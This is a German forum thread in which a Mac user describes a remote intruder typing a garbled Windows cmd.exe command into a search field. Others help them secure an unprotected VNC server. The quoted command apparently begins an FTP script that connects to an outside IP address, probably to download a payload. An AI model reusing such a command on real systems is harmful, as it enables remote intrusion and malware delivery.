Jump to content

Kann das sein? Mein Mac gehackt?


jazZbaR
 Share

6 posts in this topic

Recommended Posts

Etwas besorgniserregend, was eben passiert ist. ich war mit Firefox auf der google Seite und habe nach facebook protest gesucht. Plötzlich sprang die Maus ohne das ich etwas tat in das Suchfeld und es wurde folgender Code eingetippt

 

5szstemroot5#szstem32#cmd.exe del eq7echo open 190.209.51.212 1693 .. eq7echo user

 

Eindeutig ein Windows Code, aber denoch lief die Maus über meinen Desktop als ob einer sich per TeamViewer bei mir eingeloggt hätte. Schloss Firefox und hat sich ein bisschen umgesehen. Ich hab das ganze einfach mal beobachtet, weil ich echt sprachlos war.

 

Ich hab hier zu Hause im WLAN noch ein iPad mit dem ich gelegentlich mit iTeleport auf den Mac zugreife. Damals habe ich irgendeinen Systemserver aktiviert, damit das funktioniert. Liegt da vielleicht die Schwachstelle?

 

Würde ungern meinen Mac plattmachen. Hat jemand eine Idee wie ich das wieder beheben kann?

Link to comment
Share on other sites

Etwas besorgniserregend, was eben passiert ist. ich war mit Firefox auf der google Seite und habe nach facebook protest gesucht. Plötzlich sprang die Maus ohne das ich etwas tat in das Suchfeld und es wurde folgender Code eingetippt

 

5szstemroot5#szstem32#cmd.exe del eq7echo open 190.209.51.212 1693 .. eq7echo user

 

Eindeutig ein Windows Code, aber denoch lief die Maus über meinen Desktop als ob einer sich per TeamViewer bei mir eingeloggt hätte. Schloss Firefox und hat sich ein bisschen umgesehen. Ich hab das ganze einfach mal beobachtet, weil ich echt sprachlos war.

 

Ich hab hier zu Hause im WLAN noch ein iPad mit dem ich gelegentlich mit iTeleport auf den Mac zugreife. Damals habe ich irgendeinen Systemserver aktiviert, damit das funktioniert. Liegt da vielleicht die Schwachstelle?

 

Würde ungern meinen Mac plattmachen. Hat jemand eine Idee wie ich das wieder beheben kann?

 

Hallo

 

kann das sein, dass dein sog. Systemserver einige Ports frei lässt

hast du in deinem MacSystem eine Firewall aktiviert...sind da Logs enthalten wo du nachschauen kannst woher das kommt?

 

Ich jedenfalls nutze auch das iTeleport und das einige male im Tag..

 

schau mal im Systemeinstellungen/Freigaben

Bildschirmfreigabe...welcher nutzer ist da drinn? dann Computereinstellungen: da sollte eigendlich nur das VNC aktiviert und nur dein Pers. PW drinnen sein

 

das iTeleport funktioniert ohne weiteren zusatzserver Software oder jegleichen anderen müll

 

eine empfehlung vielleicht..

das Netbarrier...ist ein gutes Tool für Netzwerküberwachung jeglicher art..

 

SG

Link to comment
Share on other sites

Ja ich habe LittleSnitch als Firewall. Aber ehrlich gesagt, befinden sich Freigaben für Apps darin, von denen wahrscheinlich die wenigsten und ich mit eingeschlossen, wissen wofür die sind. Wie z.B. nmblookup???

 

Unter Systemeinstellungen/Freigaben ist nur die Dateifreigabe für 2 Ordner aktiviert. Unter Optionen ist AFP, FTP und SMB aktiviert.

 

Ich finde den Punkt gerade nicht, wo ich einstellen konnte, dass ich jederzeit über das iPad per iTeleport mich mit dem Mac verbinden kann. Irgendwo konnte ich einen Server starten, der permanent im Hintergrund läuft.

 

Was ich nicht verstehe, falls sich ein Mac Trojaner oder eine andere Fernteuerungssoftware für den Mac bei mir eingenistet hat, warum werden dann diese Windows Codes in Firefox eingetippt. Bin echt ratlos.

 

EDIT: Habe die Einstellung für den System Server im Vine Server App gefunden und unter Authenfication stand None Password. Hab das mal geändert. Aber sicher fühl ich mich dennoch nich, weil der Zugriff ja nur aus dem lokalen Netzwerk konfiguriert ist.

Link to comment
Share on other sites

Vielen Dank für den Link. Das war schon mal ganz informativ.

 

Habe jetzt den Vine System Server mit einem sehr starken Passwort und SSH geschützt. Hoffe das Hilft erstmal.

 

Wenn ich das richtig verstanden habe, schnüffelt eine Bot nach offenen VNC Ports und führt dann mit der cmd.exe diese Codes aus. Da ich Mac nutze funktioniert das dann nicht? Muss ich noch eine besondere "Desinfizierung" vornehmen?

 

THX

Link to comment
Share on other sites

 Share

×
×
  • Create New...